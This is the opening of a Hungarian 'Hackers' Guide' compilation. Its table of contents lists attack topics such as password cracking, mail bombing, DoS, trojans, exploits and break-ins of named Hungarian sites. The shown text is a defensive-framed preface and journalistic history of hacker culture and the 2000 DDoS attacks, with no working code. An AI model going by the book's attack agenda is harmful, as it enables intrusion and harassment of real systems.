Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Hackers’ Guide<br />
by Phant0m<br />
Volume #1
Hackers’ Guide<br />
Tartalom:<br />
Volume #1<br />
Előszó ..........................................................................................................................<br />
<strong>Történet</strong> .......................................................................................................................<br />
Hacker-ek, cracker-ek, phreak-ek<br />
Billentyűs betolakodók<br />
Alternatív kultúra: Hackerek<br />
Hackerek<br />
A törés művészete<br />
Mi az igazság<br />
Kevin D. Mitnick, a CyberKalóz<br />
Hacker találkozó Hollandiában<br />
A hacker kiáltványa<br />
Hacker-etika<br />
Fontosabb időpontok az Internet fejlődésében<br />
Hálózattörténelem<br />
A Byte magazin 98/4 -es számában megjelent cikke<br />
Kezdés .........................................................................................................................<br />
A Hacker és társai<br />
Első lépések…<br />
Ismertetô a hackelésrôl laikusoknak<br />
Kik a hackerek<br />
Mi is a cracker? Hogyan tevékenykedj illegálisan de biztonságban<br />
Hogyan lesz az emberből Hacker<br />
Használjatok PGP-t<br />
A titkosításról<br />
A paranoiáról<br />
Hack Windows alól és tudnivalók<br />
Az IP szerzés módszerei<br />
Social Engineering (társadalommérnökség)<br />
Trashing or dumpster diving (kukabúvárkodás)<br />
Backdoors<br />
Mi is az a trojai program<br />
Pár szó a trojai programokról<br />
Snifferek<br />
Keyloggerekről általában<br />
Mi az IP, TCP/IP<br />
A WORLD WIDE WEB<br />
File Transfer Protocoll (FTP)<br />
GOPHER<br />
MI A TELNET<br />
Socks4 Protokoll<br />
Betörések felfedezése és kezelése I.<br />
Betörések felfedezése és kezelése II.<br />
Betörések felfedezése és kezelése III.<br />
Betörések felfedezése és kezelése IV.<br />
Betörések felfedezése és kezelése V.<br />
2
Betörések felfedezése és kezelése VI.<br />
Hackers’ Guide<br />
Anonimitás ..................................................................................................................<br />
Névtelenség ...avagy "Mindenki minket figyel!"<br />
Hogyan maradjunk ismeretlenek?<br />
Egyedi azonosító?<br />
Proxy I.<br />
Proxy II.<br />
Proxy Hunter leírás<br />
Password .....................................................................................................................<br />
A jelszavakról általában<br />
A linux passwd file felépítése<br />
Jelszófeltörés<br />
Jelszavak törése<br />
Jelszótörés<br />
Passwd<br />
Re: Passwd<br />
PWL Hacking Tutorial<br />
Password fileok keresése<br />
Hogyan válasszunk rossz jelszót<br />
CuteFTP bizonytalan jelszótárolása<br />
BIOS Hátsóajtók<br />
BIOS jelszavak feltörése<br />
Denial of Service (DoS) ..............................................................................................<br />
Hogyan "lőjjünk" ki másokat a netről?<br />
És lőn sötétség a click után...<br />
A +++ath0 avagy a modemblitz<br />
NewTear<br />
DoS Tamadasok fajtai<br />
Internetto chat szivatás<br />
NUKING IS LAMEEE....<br />
Win98 TCP/IP bug<br />
D.o.S-ra alkalmas bug a W'2000-ben<br />
Pirch'98 ident/fserve daemon DoS támadás<br />
War FTP DoS (MKD/CWD)<br />
Email ............................................................................................................................<br />
Fake Email<br />
Hogyan küldjünk álcázott leveleket? (fakemail)<br />
Spoofed mail bombing by ReWtEr<br />
Levélbomba<br />
"Végtelenített" E-MAIL<br />
A legegyszerubb módszer levélbombázáshoz<br />
A Freemailrol ugy altalaban<br />
Szex kepek e-mailre<br />
Levélbomba törlése<br />
Outlook Express levelek<br />
Outlook Express 5 bug<br />
3
Hackers’ Guide<br />
WinPopup és NetSend üzenetek álcázása<br />
Volume #2<br />
Linux ............................................................................................................................<br />
Alap hack modszerek teoretikai oldala...<br />
Linux workstation törés<br />
Linux szerver törés<br />
Linux törés<br />
Egy lehetséges támadásra példa<br />
Backdoorokról gyakorlatban<br />
Unix Rendszerek Biztonsági Lyukai<br />
Root jog szerezése, ha alap felhasználo vagy<br />
Linux szerverek biztonsági kérdései<br />
Unix parancsok, amelyeket ismerned kell<br />
IP Chains kiegészítés<br />
Linux ipchains Firewall hiba<br />
Fakeuser<br />
Exploitok és a Telnet<br />
FTPCOVERSION bug<br />
Kernel bug<br />
WuFtpd trükk<br />
PING -R : kernel panic<br />
Hálozati Programozás C nyelven<br />
SAINT<br />
Windows ......................................................................................................................<br />
Back Orifice<br />
NetBus 1.70 Leírás<br />
Trójai programok felderítése WIN95/98 alatt I.<br />
Trójai programok felderítése WIN95/98 alatt II.<br />
Trójai programok felderítése WIN95/98 alatt III.<br />
Szempontok Windows trojan készítéséhez<br />
Kevésbé ismert Windows'9x biztonsági lyukak<br />
Jelszó eltüntetése Windowsrol<br />
Registryben tárolt jelszavakról<br />
Windows ScreenSaver Jelszó<br />
NT Password Cracker<br />
Windows NT munkaállomás törése<br />
Windows NT szerver törése<br />
Windows NT bug<br />
Re: Windows NT bug<br />
Hogyan fagyasszunk Win-es gépet intraneten<br />
Windows nyomtatómegosztás - bug<br />
Hogyan szerezzünk IP-t OP jog nélkül<br />
IIS 4.0 Microsoft Server Remote Exploit<br />
NT támadás<br />
FrontPage bug<br />
Minden az UNICODE bug-ról<br />
Internet Explorer tartalmi tanácsadó kikapcsolása<br />
4
Riched20.dll<br />
ActiveX I.<br />
ActiveX II.<br />
Hackers’ Guide<br />
Novell ...........................................................................................................................<br />
Novell jelszavak a Windows alatt<br />
Novell LAN Hacking<br />
Novell érdekességek<br />
Novell Groupwise bug<br />
IRC, ICQ .......................................................................................................................<br />
Két tűz mögött<br />
RFC-1459<br />
A mi mIRC-ünk... I. rész: Popups<br />
A mi mIRC-ünk... II. rész: Aliases<br />
A mi mIRC-ünk... III. rész: Remote<br />
A mi mIRC-ünk... IV. rész: Sockets<br />
A mi mIRC-ünk... V. rész: Dialogs<br />
A mi mIRC-ünk... VI. rész: Ami az eddigiekbôl kimaradt...<br />
Az IRC-harc alapjairól<br />
IRC Hacking Tutorial<br />
A null csatorna<br />
A #2,000 bug<br />
User klónozás<br />
Fake OP<br />
Fakedrop<br />
Flood<br />
mIRC flood védelem<br />
mIRC jelszó kikapcsolása<br />
mIRC 5.4 Kill<br />
mIRCkill patch<br />
Hogyan juss be egy csatira vagy szerverre, ha bannoltak?<br />
Az "eredeti név"-ben vezérlôjelek használata<br />
Az Eggdrop IRC bot<br />
Eggdrop 1.3.26 bug<br />
CTCP trükk<br />
DCC gyorsítás<br />
Hogyan tevékenykedj (írj, csatlakozz csatira, stb.) más nevében?<br />
Hogyan rejtsem el az IP címemet IRC-n?<br />
WAC - WoRsITE A CoToCoP<br />
Advanced On-JOIN scanner<br />
Miért ne irceljünk root-ként<br />
Hogyan pusztítsunk IRC-n vagy ICQ-n<br />
ICQ exploit - avagy hogyan klonozzunk ICQ-ban<br />
ICQ<br />
Re: ICQ99 jelszavak<br />
CTCP-FAQ<br />
Web ..............................................................................................................................<br />
A site feltörés<br />
5
Hackers’ Guide<br />
Web-Hack F.A.Q.<br />
Félhivatalos Web-Hack FAQ<br />
A PHF MODSZER<br />
Hogy kell Unix ACCot szerezni 24 oraval ezen dokumentum olvasasa utan ??<br />
Mi a .cgi<br />
.cgi Egyszeruen<br />
A test-cgi sebezhetősége bizonyos beállításoknál<br />
Néhány CGI bug csak röviden<br />
Két .cgi exploit<br />
"Vadász Gábor OnLine" jelszavak<br />
Jelszóvédett weblapok feltörése<br />
Webes levelbomba kuldes [ fLip! ]<br />
Altavista.Com ...avagy a hackerek legjobb buntársa<br />
Webterminál hackelések<br />
Extra hack<br />
Re: Extra hack<br />
Hogyan hackeljük meg az Extra.Hu-t<br />
Emil.alarmix.org hack<br />
A /wwwadmin.pl Exploitról<br />
Account Manager Password Exploit (amadmin.pl)<br />
Apexec.pl Bug<br />
Campas exploit<br />
Carbo.dll exploit<br />
Exploit a Microsoft IIS-hez<br />
HTML kód, ami leöli az IE 5-öt<br />
MailMachine.cgi bug<br />
QuikStore Shopping Cart Script bug<br />
Sambar Server bug<br />
Sambar Server search CGI bug<br />
Subscribe Me Exploit (subscribe.pl)<br />
Unstorekeeper.pl Bug<br />
.asp fájlok forráskódjának megtekintése<br />
Phreak .........................................................................................................................<br />
Kálváriám a Matávval: avagy ügyintézés RULEZ!!!!<br />
A 909 használata<br />
Mi az a wardialer<br />
Wardialer 1.31 by MMan<br />
THC-Scan használat + config<br />
Híváskorlátozásfeltörő 0.01 by Mman<br />
Ophacker 0.1 by MMan<br />
"06-80"-on keresztül külföldre<br />
A pénzbedobós telefonok hackolása Amerikában és Angliában<br />
Mobildolgok<br />
SMS Flood www.777sms.hu-n keresztül<br />
Szivatás mobiltelefonon keresztül<br />
Egy Matávos levele<br />
Volume #3<br />
6
Hackers’ Guide<br />
Egyéb ...........................................................................................................................<br />
Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs?<br />
Hogyan irjunk at barmilyen filet AIX rendszerben 0-as UID nelkul ?<br />
OpenBSD felhasználói útmutató<br />
Különböző trójai programfajták leírása<br />
me$$iah trojai program<br />
RSC's Offline Server Emulator<br />
AMaViS root exploit<br />
CD-k másolásvédelmének megszüntetése<br />
amstel.interware.hu feltörése<br />
Nyugatmagyarországi Egyetem feltörése<br />
Országos Széchenyi Könyvtár feltörése<br />
Függelék ......................................................................................................................<br />
Internet kisszótár<br />
Linux Kisszótár<br />
IRC szótár<br />
Phreak szótár<br />
Szabványos portok listája<br />
Nemzetközi domain-ek<br />
A legismertebb trojai programok és portjaik I.<br />
A legismertebb trojai programok és portjaik II.<br />
BUHERÁTOR TESZT 1.1<br />
BugTraq lista részletek...<br />
Hasznos URL-ek gyüjteménye a számítógépes biztonság területén<br />
Előszó<br />
< !!! A HACKELÉST A TÖTVÉNY SZIGORÚAN BŰNTETI !!! ><br />
Akkor miért van ez a könyv? Azért, hogy fegyvert adjunk unatkozó gyerekeknek a<br />
kezébe? Tippeket adjunk hogyan törjenek be szerverekbe? Hogyan küldjenek<br />
levélbombát? Hogyan törjenek fel weblapokat?<br />
Korántsem!<br />
Azért van ez a könyv, hogy a naív és gyanútlan felhasználó és az elbizakodott<br />
rendszergazda megismerje azokat a technikákat, trükköket amivel többé-kevésbé<br />
könnyen be lehet jutni szerverekbe, hálózatokba. Hogy rámutassunk a redszerek<br />
gyenge pontjaira. Hogy igenis szükség van egy bizonyos „paranoiára” mert lehet,<br />
hogy holnap a Te gépedbe törnek be. Hogyan akarsz védekezni, ha nem tudod<br />
hogyan támadnak?<br />
7
Hackers’ Guide<br />
Ez a könyv az Interneten fellelhető magyar nyelvű hacker dokumentumok és írások<br />
összessége mindennemű tartalmi változtatás nélkül. Ahol megvolt, ott fel van<br />
tüntetve a szerző is. E könyv tartalma állandóan változik, bővül ahogy változnak a<br />
hackelés technikái is.<br />
by Phant0m<br />
************************************************************************************************<br />
Hacker-ek, cracker-ek, phreak-ek<br />
<strong>Történet</strong><br />
Az Egyesült Államokban és Nyugat-Európában 15-25 éves fiatalokból WEB-szerte<br />
ismert csoportok szervezodnek. A Legion of Doom (LoD), Masters of Deception<br />
(MoD), Cult of the Dead Cow (cDc), vagy a holland Hack-tic csak néhány, a<br />
legismertebbek közül. Tagjaik, különbözo dologra szakosodtak.<br />
A phreakek a telefonközpontok vezérloszámítógépeinek, a távközlési vonalak<br />
ingyenes igénybevételének és általában a telekommunikációnak a szakértoi.<br />
Rendelkeznek a központok átprogramozásához szükséges tudással, illetve<br />
megfelelo eszközökkel a mobil telefon hálózat forgalmának, belso adatainak<br />
lehallgatásához. Késobb ok maguk, vagy akiknek az információkat továbbadták<br />
mások költségére telefonálnak. A 95-ös adatok szerint, az összesített kár több mint 4<br />
milliárd USD. (Forrás: NCSA)<br />
A crackerek különbözo operációs rendszerekre és platformokra specializálódtak.<br />
Próbálgatnak, kisérleteznek amig valami "használhatóra" nem bukkannak. Elso<br />
lépésben a cél interaktív kapcsolat (login) megszerzése, ami kemény munkával<br />
továbbfejlesztheto root avagy superuser jogkörré, aki egy-egy gép legfobb<br />
adminisztrátora. A kis közöségeket az érdeklodés nagyobb közösségekké formálja,<br />
mert a tudás, tapasztalat így sokkal jobban átadható. Az ezirányú kutatással és<br />
információgyujtéssel is foglalkozó NCSA (National Computer Security Association)<br />
például csak az USA-ban egy olyan, több mint 400 BBS-bol álló hálózatot tart<br />
nyilván, amelyet ilyen közösségek tartanak fenn, szigorúan "belso" használatra - a<br />
telefontársaságok költségére. A tagok között munkamegosztás van. Egyesek<br />
felderítéssel foglalkoznak. Kukákban turkálnak, vállalatok papírhulladékai között<br />
keresgélnek, hátha login nevekre, jelszavakra bukkannak. Mások un. "WAR dialer"-t<br />
muködtetnek, ami éjszakánként több ezer számot is végigtárcsáz, hátha modemre<br />
bukkan a túlsó végen. A talált számok listája mint potenciális célpont felkerül a BBS<br />
hálózatra, hogy a többiek "hasznosítsák". Mások a postai hálózatok muködését<br />
tanulmányozzák, és pontos muszaki leírásokat adnak, hogyan lehet mindenféle<br />
"színes doboz"-t készíteni (blue box, red box ...stb.) a telefontársaságok kijátszására.<br />
8
Hackers’ Guide<br />
A blue box például a telefonközpontok közötti 2600 Hz-es un. in-band jelzéseket<br />
felhasználva ingyenes távhívásra "jogosít". Minden információt közzétesznek,<br />
megjelentetnek BBS-en, WWW szervereken, az általuk (is) látogatott NEWS groupok<br />
listáin, (ilyen pl. az alt. 2600 - a név a Blue box muködési frekvenciájából<br />
származik) és idoszakos kiadványokban. ( 2600 Magazine, Phreaker, Hacker.FAQ ).<br />
Az Interneten bárki szabadon hozzájuthat hacker tool-okhoz (pl. jelszó feltöro<br />
programokhoz) és a használatukhoz szükséges tudáshoz.<br />
Több-kevesebb rendszerességgel konferenciákat is szerveznek (DefCon, HoHoCon,<br />
H.O.P.E.-Hackers on Planeth Earth), ahol végre személyesen is talkálkozhatnak.<br />
Tapasztalatokat cserélnek, meghívott profiktól (ügyvédek, volt rendörök) eloadásokat<br />
hallgatnak jogaikról, védekezési lehetoségeikrol (letartóztatás-elkerülési technikák)<br />
és a rendorségi akciókról. Saját pólót nyomtatnak az esemény alkalmából.<br />
Jellegzetes pólófeliratok az alábbiak: "Root is a state of mind". Root-nak lenni (a<br />
UNIX-os gépek korlátlan hatalmú adminisztrátora) egy szellemi állapot. Vagy: "Why?<br />
Because We Can!" Hogy miért tesszük? Mert képesek vagyunk rá!<br />
Azt állítják (minden bizonnyal joggal), hogy ok csupán összegyujtik, rendezik és úgy<br />
publikálják a legtöbbször amúgy is nyilvános információkat. Szabad<br />
információáramlást kibertérben! Ez filozófiájuk egyik alapköve. Minden<br />
tevékenységük ezt szolgálja - legalábbis elvben. A másik alapko az érdeklodés. Az<br />
lehet igazi hacker akit a tudás magáért a tudásért érdekel. Az anyagi elonyökért<br />
elkövetett betörések elég ritkák. A motiváció inkább a hiúság, csínyben való<br />
részvétel, hírnév. Nemegy esetben sztárt csinált a börtönviselt crackerbol az<br />
amerikai média.<br />
A bunüldözo szervek (FBI, Secret Service High-tech Crime Division) természetesen<br />
tudnak a konferenciákról, és képviseltetik is magukat, amire a résztvevok a "Spot the<br />
FEDs" (szúrd ki az ügynököt) vetélkedovel válaszolnak. Ez már hagyomány.<br />
Komolyabb rendorségi akciókra csak akkor kerül sor, ha mondjuk kiderül, hogy valaki<br />
törölte a hotel számítógépébol a vendéglistát. Ezen persze amúgy is csak<br />
fantázianevek fordulnak elo.: Eric Blodaxe (LoD), Deth Vegetable (cDc), Optic (MoD)<br />
estleg Corrupt. Az itt egymásnak elmesélt történetek között a mulatságostól az<br />
ijesztoig minden található. Musoron vannak az osellenség a "hárombetus"<br />
kormányügynökségek gépeire való sikeres betörések. Az ügynökségek ezek létét<br />
tagadják. Hitelesen cáfolni nehéz, bizonyítani veszélyes. Biztosan megesett viszont,<br />
hogy a NASA egyik központjának klímaberendezését vezérlo számítógépbe sikerült<br />
modemes kapcsolaton behatolni. A többit az olvasók fantáziájára bízom...<br />
A témával foglalkozó ujságírók sincsenek biztonságban. 1994-ben a Slatalla-Quittner<br />
szerzopáros hosszabb cikket jelentetett meg a MoD és az LoD közötti egyik<br />
nézeteltérésrol egy amerikai lapban, "Gang War in Cyberspace" címmel. A "fiúk"<br />
zokon vették a dolgot. Eloször is átprogramozták a vevoket kiszolgáló<br />
telefonközpontot, mintha az elofizeto azt kérné (természetesen saját költségére),<br />
hogy a bejövo hívások egy másik (távolsági hívással elérheto) helyen csöngjenek ki.<br />
Ott (nem túl illedelmes bevezeto után) egy üzenetrögzíto fogadta a hívást. A szerzok<br />
döbbenetére se fonökeiknek se rokonaiknak nem tunt fel a dolog, szépen üzenetet<br />
hagytak. A bosszú folytatásaként két kisebb Internet szolgáltató (elozoleg feltört)<br />
gépérol levélbombázást indítottak a szerzok Internetre kapcsolt gépe ellen, úgyhogy<br />
azt ideiglenesen le kellett állítani.<br />
9
Hackers’ Guide<br />
A példák sora hosszan, hosszan folytatható. Az egész jelenséget két dolog teszi<br />
igazán ijesztové a kívülálló számára. Nem tudható, ki a következo célpont, és nem<br />
tudható, hogyan lehet védekezni a következo támadás ellen. A betörok nem ott<br />
törnek be ahol akarnak, de hogy hol, azt sem a biztonsági rendszereket tervezo<br />
szakértok, de talán maguk a betörok sem tudják elore megmondani. Az elony a<br />
betörok oldalán van. Nekik korlátlan idejük van, míg a védelem költségvetése mindig<br />
véges.<br />
Az egyik számítógépes biztonságról szóló könyvben az alábbiak olvashatók:<br />
"Ha mély benyomást akarsz tenni egy biztonsági szakértore, mondd azt, hogy az<br />
elmúlt 5 évben csak egyszer törtek be a rendszeredbe. Ha ugyanis azt mondod,<br />
hogy egyszer sem, akkor azt fogja hinni, még arra is képtelen vagy, hogy észleld a<br />
betöréseket."<br />
Hogyan lehet védekezni?<br />
Az amerikai hatóságok '91-ben az egész USA-ra kiterjedo hajtóvadászatot indítottak<br />
aminek 14 letartóztatás majd 4 személy börtönbüntetése lett az eredménye. Az<br />
események hu krónikája a WEB-en is olvasható, könyv formában kiadott "Hackers<br />
Crackdown". A hatóságok akciói, és egyáltalán a kérdéskör jogi kezelése (nem<br />
beszélve arról, hogy a jog, mint mindig, messze elmarad a technika mögött) POST<br />
MORTEM, vagyis a kárvallottakon már nem sokat segít. Az Elektronikus<br />
Határvidéken - akárcsak egykor a vadnyugaton - mindenki a maga igazát védi,<br />
ahogyan tudja. Néha igencsak vadregényes módszerekkel. A már említett NCSA pl.<br />
un. Tiger Team-et tart fenn, melynek feladata, hogy a megbízó cégek hálózataiba<br />
bármilyen hacker módszerrel betörjön, így kimutatva a védelem gyenge pontjait. A<br />
hatékonyabb munka érdekében a MasterCard támogatásával beépültek Cracker<br />
közöségbe. Érvényes, áldozatnak szánt hitelkártya számokat közöltek a<br />
crackerekkel, cserébe hozzáférést nyertek a már említett, több mint 400 gépes BBS<br />
hálózat anyagához. Ezt az NCSA éjszakánként gondosan végigindexeli, hogy<br />
könnyebb legyen téma szerint keresni a védelmi rendszerek tervezésekor. WWW<br />
szerverükön a társaság tagjai rengeteg hasznos információt találhatnak.<br />
Coverrid<br />
************************************************************************************************<br />
Billentyűs betolakodók<br />
Internetes bűnözés<br />
Előbb a Yahoo!, aztán az EBay. A világháló sebezhetősége komoly veszélyt<br />
jelent az elektronikus kereskedelemre - és mindannyiunkra.<br />
Bekövetkezett az, amire számítógépes biztonsági szakértők még gondolni sem<br />
mertek: egymás után, dominóként dőltek össze a világháló legnagyobb elektronikus<br />
kereskedelmi fórumai. A Yahoo!-val kezdődött. Február 6-án az óriásportál három<br />
10
Hackers’ Guide<br />
órára leállt. A következő napon - mindössze órákkal tőzsdei bevezetése után - a<br />
kiskereskedelemben utazó Buy.com társaságot érte utol a végzet. Aztán este sor<br />
került az eBay, az Amazon.com és a CNN honlapjaira is. A következő reggelen a<br />
káosz tovább gyűrűzött az E*Trade online brókercég és mások felé: internetes lapjaik<br />
forgalma gyakorlatilag megbénult.<br />
Mindez talán egyetlen szuper-hacker műve volt? Az ügyet vizsgáló nyomozók<br />
egyelőre nem tudják - vagy nem árulják el. De a szakembereket a felelős személy<br />
vagy csoport kiléténél jobban aggasztja, milyen könnyedséggel hangolták össze és<br />
vezényelték le a támadássorozatot. Minden jel arra utal, hogy valaki otthona<br />
melegében üldögélve, néhány billentyű lenyomásával súlyos zavart kelthet az egész<br />
világ elektronikus kereskedelemben.<br />
SAKK ÉS MATT<br />
A szakemberek szerint az egész annyira egyszerű, hogy az már ijesztő: a pusztítást<br />
végző szoftver használata könnyű, a világháló számtalan underground hacker<br />
oldaláról gond nélkül letölthető. A rövidke programot azután számítógépek<br />
garmadájára csempészik fel a világ minden pontján.. Aztán csak egy gombnyomás<br />
és az összes ilyen PC akcióba lép: újra és újra egy egyszerű információkérést<br />
küldenek a kiszemelt honlapnak - másodpercenként több százszor. Hiába minden<br />
bonyolult tűzfal, behatolást érzékelő rendszer, titkosítás és biztonsági előírás, az<br />
elektronikus boltok egy-kettőre áldozatául esnek ennek a viszonylag egyszerű<br />
eljárásnak. Olyan ez,mint amikor többen egyszerre tárcsázzák ugyanazt a<br />
telefonszámot, s mindannyian foglalt jelzést hallanak. "Ilyen nagyságrendben ilyesmit<br />
eddig még nem tapasztaltunk, nemcsak az EBay-nél, de máshol sem" - állítja<br />
Margaret C. Whitman, a társaság vezérigazgatója.<br />
A támadók sem a website-ot nem törték fel, sem adatokat nem tettek tönkre, sem<br />
hitelkártyaszámokat nem loptak - legalábbis ez idáig. Ám ezzel a pokolian egyszerű<br />
trükkel mégis sikerült átmenetileg megbénítani a kereskedelmet a világháló<br />
legnagyobbjai közé tartozó több portálon, nekünk szegezve a kérdést: Mennyire<br />
sebezhető az internet? Veszélyeztethetik az ehhez hasonló akciók az idén várhatóan<br />
450 milliárd dollár kereskedelmi forgalmat lebonyolító világháló robbanásszerű<br />
növekedését? "Odakint már egy ideje háború folyik, legfeljebb eddig rejtve maradt" -<br />
mondja James Adams, a cyber-fenyegetésekre specializálódott Virginia állambeli<br />
iDEFENSE egyik alapítója. "Most ébredtek rá széles körben az emberek a háló<br />
sebezhetőségére, és arra, hogy mibe is keveredtünk, amikor gondolkodás nélkül<br />
beneveztünk az információs szupersztráda gyorsasági versenyébe."<br />
Persze még a legdörzsöltebb "cyberkopók" sem állítják, hogy a net egyik napról a<br />
másikra hervadásnak indulna az ilyen kalózakciók miatt. De az elmúlt napok<br />
eseményei után a napnál is világosabb: az internetes vállalatoknak legalább annyi<br />
gondot kell fordítaniuk honlapjaik és hálózataik védelmére, mint arra, hogy azokat<br />
összekössék vásárlóikkal, beszállítóikkal - és velünk. Emléketetőül csak a közelmúlt<br />
történéseinek hevenyészett listája:<br />
- Decemberben 300 ezer hitelkártyaszámot loptak el az online<br />
zenekereskedést folytató CD Universe-től.<br />
- Márciusban az elektronikus levelező rendszereken végigsöprő, s azokat<br />
11
Hackers’ Guide<br />
világszerte megbénító Melissa vírus mintegy 80 millió dolláros kárt okozott.<br />
- Ugyanabban a hónapban a felbérelt hackerek beismerték, hogy feltörték az<br />
AT&T, a GTE és a Sprint távközlési óriások rendszereit, többek között olyan<br />
hívókártya számokért, amelyek végül olasz szervezett bűnbandák kezébe<br />
kerültek. Az FBI a telefontársaságoknak okozott kárt 2 millió dollárra becsülte.<br />
A szélessávú Internet-kapcsolatok mindennapossá válásával még súlyosabbá válhat<br />
helyzet. Egyre többen vannak, akik a világhálót többé nem alkalmanként,<br />
tárcsázással érik el a világhálót, hanem a telefonhoz hasonlóan állandó kapcsolatban<br />
lesznek a hálózattal. Meglehet, ez zene az elektronikus kereskedők füleinek, viszont<br />
a vásárlókra valódi veszélyt az jelenthet, ha a cybercsalók úgy járhatnak ki-be<br />
számítógépes rendszerünkben, ahogy kedvük tartja. "Addig kopogtatnak, míg nyitott<br />
ajtót nem találnak." - mondja Bruce Schneyder biztonságtechnikai szakértő.<br />
A legnagyobb fenyegetés - bármilyen elkeserítő is - belülről jön. A nyomozó<br />
hatóságok becslései szerint a betörések mintegy 60 százalékát belső alkalmazottak<br />
követik el.<br />
A számítógépes hálózatok könnyen hozzáférhető belépési pontok a bosszúszomjas<br />
alkalmazottak, kémek, tolvajok, "szociopaták" és unatkozó tinédzserek számára. Ha<br />
már egyszer bejutottak a vállalat belső hálózatába, szabadon garázdálkodhatnak az<br />
ott található szellemi tulajdonnal vagy adatokkal, munkafolyamatokat<br />
akadályozhatnak, vagy akár teljesen tönkretehetnek egy adott üzletet vagy karriert.<br />
"Ez én felfogásom szerint minden internetes tranzakció potenciális célpont" - vallja<br />
Paul Field, a számítógépes kalózból lett biztonsági tanácsadó.<br />
Egy kis felfordulást szeretne kelteni? Biztonsági szakértők szerint mintegy 1900<br />
website-ról tölthetőek le - ingyen - azok a digitális eszközök, amelyek segítségével<br />
bárki szimatolhat mások gépén, azt lefagyaszthatja, átveheti felette az irányítást,<br />
vagy megszerezheti minden egyes billentyűleütés másolatát. Steve O'Brien, az<br />
illetéktelen behatolások felderítésével és biztonsági megoldásokkal foglalkozó,<br />
marylandi székhelyű cég, az Info-Ops.com információs műveletekért felelős alelnöke<br />
szerint a számítógépek feltörésének módozatai napról napra fejlődnek. A növekvő<br />
veszélyért O'Brien nemcsak a hacker-csoportokat, de a programok megállíthatatlan<br />
terjedését is okolja. Ami egykor ritkaságnak számított - ma naponta legalább három<br />
új rosszindulatú szoftvert vagy sebezhető programpontot fedeznek fel.<br />
Billentyűs betolakodók 2<br />
Kitárt kapuk<br />
Mindez széles támadási felületet biztosít a hackereknek. Egy hagyományos<br />
telefonos modemmel összekötött személyi számítógép a felhasználó minden egyes<br />
hálóra kapcsolódásakor új internetes (IP) címet kap. Ez komoly gát az adott gépet az<br />
eBay-t, a Yahoo!-t és másokat ért támadáshoz hasonló eszközökkel feltörni és<br />
"eltéríteni" igyekvő kalózok előtt. Ezzel ellentétben a kábeles és digitális előfizetői<br />
vonalak igen csábítóak a hackerek számára, mivel ezek a gépek folyamatos<br />
12
Hackers’ Guide<br />
kapcsolatban vannak a világhálóval, s általában fix, az e-mailekből és a hírfórumokra<br />
küldött levelekből könnyen kiolvasható címmel rendelkeznek. A gépeket megvédeni<br />
képes "tűzfal" néven ismert biztonsági rendszerek minden otthoni kábeles és digitális<br />
előfizető számára is elérhetőek. De amíg ezek használata nem közelíti meg a 100<br />
százalékot, nem akadályozhatják meg a betöréseket.<br />
Az információs háztartási eszközök korának felvirradtával a helyzet tovább romolhat.<br />
Számos elemző szerint az Egyesült Államokat már a közeljövőben eláraszthatják a<br />
webböngészős televíziók, a hálózatos játékvezérlők, az intelligens hűtőszekrények<br />
és a hálóról programokat letöltő webtelefonok. Ezekben az eszközökben erős, az<br />
internettel kapcsolatban álló processzorok dolgoznak, amelyeket egy támadás során<br />
ki lehet használni.<br />
Nem mintha a szélessávú internet felhasználói nem kapcsolódhatnának le a<br />
világhálóról. De ahogy egyre több izgalmas lehetőség tárul fel, senkinek sem lesz<br />
már ehhez kedve. Folyamatos zene- és videoszolgáltatás, napi 24 órás hírszolgálat<br />
és a szélessávú webes integráció sok más fajtája jelenik majd meg. Hogy<br />
kihasználják ezek előnyeit, az emberek éjjel-nappal nyitva tartják majd az "ajtókat".<br />
Semmivel sem rózsásabb a helyzet a vállalatoknál. A rendszerbiztonság náluk jó<br />
úton tart afelé, hogy alapvető és drága szükségletté váljon. Az amerikai vállalati<br />
szféra tavaly 4,4 milliárd dollárt költött internetes biztonsági programokra, így<br />
"tűzfalakra", behatolásjelző szoftverekre, digitális tanúsítványokra, valamint hitelesítő<br />
és engedélyeztető programokra. E kiadások 2003-ra elérhetik a 8,3 milliárd dollárt.<br />
TERJEDŐBEN<br />
A számítógépes bűnözés mégis terjed. Az FBI és a Computer Security Institute 520<br />
vállalatot és intézetet felölelő felmérése során a válaszadók több mint 66 százaléka<br />
számolt be számítógépes hálózata illetéktelen használatáról a kérdezést megelőző<br />
12 hónap során. 1997-ben ez még csak 50 százalék volt. És a behatolásoknak<br />
immár 57 százaléka volt összefüggésbe hozható az internettel, a két évvel korábbi<br />
45 százalékkal szemben.<br />
Bármilyen nagynak is tűnnek ezek a számok, igazából senki sem tudja, hogy<br />
menynyire elterjedt az internetes bűnözés. A legtöbb támadás - biztonsági szakértők<br />
szerint akár 60 százalékuk is - észrevétlen marad. Ám még az észlelt támadásoknak<br />
is csupán legfeljebb 15 százalékát jelentik a bűnüldöző hatóságoknak. A vállalatok<br />
kerülik a nyilvánosságot. Amikor az orosz alvilág hackerek segítségével betört a<br />
Citibankba és onnan leemelt 10 millió dollárt - csak 400 ezret sikerült belőle<br />
visszaszerezni - a konkurencia a hírt reklámkampányaiban a bank ellen fordította.<br />
Ez tovább nehezíti a hatóságok munkáját. Az elektronikus támadást elszenvedő<br />
vállalatok túlnyomó része nem nyilatkozik a sajtónak. Leginkább vevőik bizalmának<br />
elvesztésétől és imidzsük sérülésétől tartanak - nem beszélve a támadást majmoló<br />
hackerektől való félelemről. A február 8-i és 9-i támadásokat követően az általában<br />
bőbeszédű internetes cégvezetők, az E*Trade-től a Priceline.com-ig, árulkodó<br />
hallgatásba burkolóztak. Azok, akiket még nem ért támadás, vonakodtak<br />
megszólalni, nehogy ezzel hívják fel site-jukra a figyelmet. A többieknek pedig már<br />
elegük volt a nyilvánosságból.<br />
13
Hackers’ Guide<br />
HONLAPELTÉRÍTÉS<br />
A bűnüldözők egyik problémája, hogy a hackerek látszólag mindenütt jelen vannak.<br />
Előfordul, hogy úgynevezett számítógépes biztonsági cégeknél dolgoznak. Egyre<br />
gyakoribbak a külföldről, különösen a Kelet-Európából induló támadások. A probléma<br />
súlyosságát jelzi, hogy az America Online 1996-ban a saját biztonsága érdekében<br />
inkább megszakította összeköttetését Oroszországgal. És ha a kalózok miatti<br />
aggódás nem volna elég, az online csalások száma is emelkedőben van. A<br />
fogyasztók által bejelentett, hamis meggazdagodási lehetőségekkel kecsegtető<br />
tervekkel vagy soha meg nem érkezett aukciós tárgyakkal kapcsolatos panaszokkal<br />
foglalkozó kereskedelmi hatóság, a Federal Trade Commission (FTC) tavaly 61 pert<br />
